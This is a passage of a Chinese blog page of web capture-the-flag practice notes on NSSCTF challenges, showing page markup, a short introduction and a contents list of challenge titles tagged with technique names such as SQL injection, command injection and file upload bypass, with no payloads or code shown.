<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=ZCOOL+XiaoWei:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"czchenzhan.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":true,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":"ture","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="解题思路记录&emsp;&emsp;博主按NSSCTF-Web板块的顺序进行Web练习，并记录心得如下！ &emsp;&emsp;注：由于题目数量较多，篇幅过长，使用时请找到指定题目，点击目录快速到达；返回时可点击左下角↑ xx%按钮即回到目录">
<meta property="og:type" content="article">
<meta property="og:title" content="NSSCTF-Web做题笔记">
<meta property="og:url" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="陈展的博客">
<meta property="og:description" content="解题思路记录&emsp;&emsp;博主按NSSCTF-Web板块的顺序进行Web练习，并记录心得如下！ &emsp;&emsp;注：由于题目数量较多，篇幅过长，使用时请找到指定题目，点击目录快速到达；返回时可点击左下角↑ xx%按钮即回到目录">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/382_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/384_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/386_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/427_Base64%E7%A0%81%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E5%9B%9E%E6%98%BE%E7%82%B9%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_test_tb%E6%89%80%E6%9C%89%E5%88%97.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_users%E6%89%80%E6%9C%89%E5%88%97.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/424_%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/424_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_WLLMresponse.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_a.php%E8%AE%BF%E9%97%AE.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_IP%E4%BF%AE%E6%94%B9.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E6%96%B0%E6%96%87%E4%BB%B6%E6%8F%90%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E6%96%B0PHP%E4%BB%A3%E7%A0%81.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/344_%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/344_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/426_%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/426_PHP%E4%BB%A3%E7%A0%81%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/426_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/423_%E6%8A%93%E5%8C%85%E4%BF%AE%E6%94%B9%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/423_%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/423_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3865_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/388_CT%E4%BF%AE%E6%94%B9%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/388_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3863_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/429_%E5%8A%A0%E5%AF%86%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/429_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/441_Base64%E5%8A%A0%E5%AF%86%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/441_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/958_%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/958_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2011_ha1x1ux1u%E4%BB%A3%E7%A0%81.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2011_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2011_%E8%A7%A3%E6%B3%952.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3864_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3873_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E5%B0%9D%E8%AF%95.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3873_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_curl%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_%E6%BA%90%E7%A0%81%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_PHP%E4%BB%A3%E7%A0%81.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2074_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/19_%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%E5%B0%9D%E8%AF%95.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/19_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/22_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/1096_%E5%88%9D%E6%AD%A5%E5%B0%9D%E8%AF%95.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/1096_index%E6%9F%A5%E7%9C%8B.png">
<meta property="og:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/1096_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="article:published_time" content="2024-11-07T07:06:56.732Z">
<meta property="article:modified_time" content="2024-11-13T16:01:07.701Z">
<meta property="article:author" content="作者：陈展">
<meta property="article:tag" content="CTF-Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/382_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">


<link rel="canonical" href="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/","path":"2024/11/07/NSSCTF-Web做题笔记/","title":"NSSCTF-Web做题笔记"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>NSSCTF-Web做题笔记 | 陈展的博客</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">陈展的博客</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">记录点滴</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">1.</span> <span class="nav-text">解题思路记录</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.1.</span> <span class="nav-text">382_[SWPUCTF 2021 新生赛]gift_F12</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.2.</span> <span class="nav-text">384_[SWPUCTF 2021 新生赛]jicao</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.3.</span> <span class="nav-text">386_[SWPUCTF 2021 新生赛]easy_md5 –弱比较 –数组绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.4.</span> <span class="nav-text">427_[SWPUCTF 2021 新生赛]include –PHP伪协议 –文件包含漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.5.</span> <span class="nav-text">387_[SWPUCTF 2021 新生赛]easy_sql –字符型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.6.</span> <span class="nav-text">424_[SWPUCTF 2021 新生赛]easyrce –eval() –命令执行函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.7.</span> <span class="nav-text">383_[SWPUCTF 2021 新生赛]caidao –同424</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.8.</span> <span class="nav-text">3861_[LitCTF 2023]我Flag呢？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.9.</span> <span class="nav-text">385_[SWPUCTF 2021 新生赛]Do_you_know_http –HTTP浏览器修改 –HTTP请求IP更改</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.10.</span> <span class="nav-text">425_[SWPUCTF 2021 新生赛]babyrce –空格绕过 –&#x2F;绕过 –命令执行函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.11.</span> <span class="nav-text">344_[第五空间 2021]WebFTP –目录扫描 –phpinfo()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.12.</span> <span class="nav-text">426_[SWPUCTF 2021 新生赛]ez_unserialize –反序列化 –对象反序列化字串解读</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.13.</span> <span class="nav-text">423_[SWPUCTF 2021 新生赛]easyupload2.0 –文件上传 –文件后缀绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.14.</span> <span class="nav-text">3865_[LitCTF 2023]PHP是世界上最好的语言！！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.15.</span> <span class="nav-text">388_[SWPUCTF 2021 新生赛]easyupload1.0 –文件上传 –phpinfo()直出 –MIME绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.16.</span> <span class="nav-text">3863_[LitCTF 2023]导弹迷踪 –不知道怎么评价</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.17.</span> <span class="nav-text">429_[SWPUCTF 2021 新生赛]no_wakeup –反序列化 –魔术方法绕过 –__wakeup()绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.18.</span> <span class="nav-text">441_[SWPUCTF 2021 新生赛]PseudoProtocols –PHP伪协议 –file_get_contents() –文件包含漏洞 –data:&#x2F;&#x2F;text&#x2F;plain伪协议</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.19.</span> <span class="nav-text">958_[NCTF 2018]签到题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.20.</span> <span class="nav-text">2011_[NISACTF 2022]easyssrf –PHP伪协议 –SSRF漏洞 –stristr()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.21.</span> <span class="nav-text">3864_[LitCTF 2023]Follow me and hack me</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.22.</span> <span class="nav-text">3873_[LitCTF 2023]Ping –ping命令注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.23.</span> <span class="nav-text">713_[BJDCTF 2020]easy_md5 –弱比较 –数组绕过 –md5() –MySQL特性</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.24.</span> <span class="nav-text">2074_[NSSCTF 2022 Spring Recruit]ezgame</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.25.</span> <span class="nav-text">19_[suctf 2019]EasySQL –SQL注入 –SQL注入类型 –堆叠注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.26.</span> <span class="nav-text">22_[ZJCTF 2019]NiZhuanSiWei –PHP伪协议 –file_get_contents() –反序列化 –preg_match() –有问题尚未解决</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.27.</span> <span class="nav-text">1096_[GXYCTF 2019]Ping Ping Ping –ping命令注入 –空格绕过 –flag字串绕过</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">作者：陈展</p>
  <div class="site-description" itemprop="description">欢迎到访</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://czchenzhan.github.io/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="作者：陈展">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="陈展的博客">
      <meta itemprop="description" content="欢迎到访">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="NSSCTF-Web做题笔记 | 陈展的博客">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          NSSCTF-Web做题笔记
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-11-07 15:06:56" itemprop="dateCreated datePublished" datetime="2024-11-07T15:06:56+08:00">2024-11-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-11-14 00:01:07" itemprop="dateModified" datetime="2024-11-14T00:01:07+08:00">2024-11-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF-Learning/" itemprop="url" rel="index"><span itemprop="name">CTF Learning</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1><span id="解题思路记录">解题思路记录</span></h1><p>&emsp;&emsp;博主按NSSCTF-Web板块的顺序进行Web练习，并记录心得如下！</p>
<p>&emsp;&emsp;注：由于题目数量较多，篇幅过长，使用时请找到指定题目，点击目录快速到达；返回时可点击左下角<code>↑ xx%</code>按钮即回到目录</p>
<span id="more"></span>

<!-- toc -->

<ul>
<li><a href="#382_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bgift_f12">382_[SWPUCTF 2021 新生赛]gift_F12</a></li>
<li><a href="#384_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bjicao">384_[SWPUCTF 2021 新生赛]jicao</a></li>
<li><a href="#386_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Beasy_md5-%E5%BC%B1%E6%AF%94%E8%BE%83-%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87">386_[SWPUCTF 2021 新生赛]easy_md5 –弱比较 –数组绕过</a></li>
<li><a href="#427_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Binclude-php%E4%BC%AA%E5%8D%8F%E8%AE%AE-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E">427_[SWPUCTF 2021 新生赛]include –PHP伪协议 –文件包含漏洞</a></li>
<li><a href="#387_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Beasy_sql-%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5">387_[SWPUCTF 2021 新生赛]easy_sql –字符型注入</a></li>
<li><a href="#424_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Beasyrce-eval-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0">424_[SWPUCTF 2021 新生赛]easyrce –eval() –命令执行函数</a></li>
<li><a href="#383_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bcaidao-%E5%90%8C424">383_[SWPUCTF 2021 新生赛]caidao –同424</a></li>
<li><a href="#3861_litctf-2023%E6%88%91flag%E5%91%A2">3861_[LitCTF 2023]我Flag呢？</a></li>
<li><a href="#385_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bdo_you_know_http-http%E6%B5%8F%E8%A7%88%E5%99%A8%E4%BF%AE%E6%94%B9-http%E8%AF%B7%E6%B1%82ip%E6%9B%B4%E6%94%B9">385_[SWPUCTF 2021 新生赛]Do_you_know_http –HTTP浏览器修改 –HTTP请求IP更改</a></li>
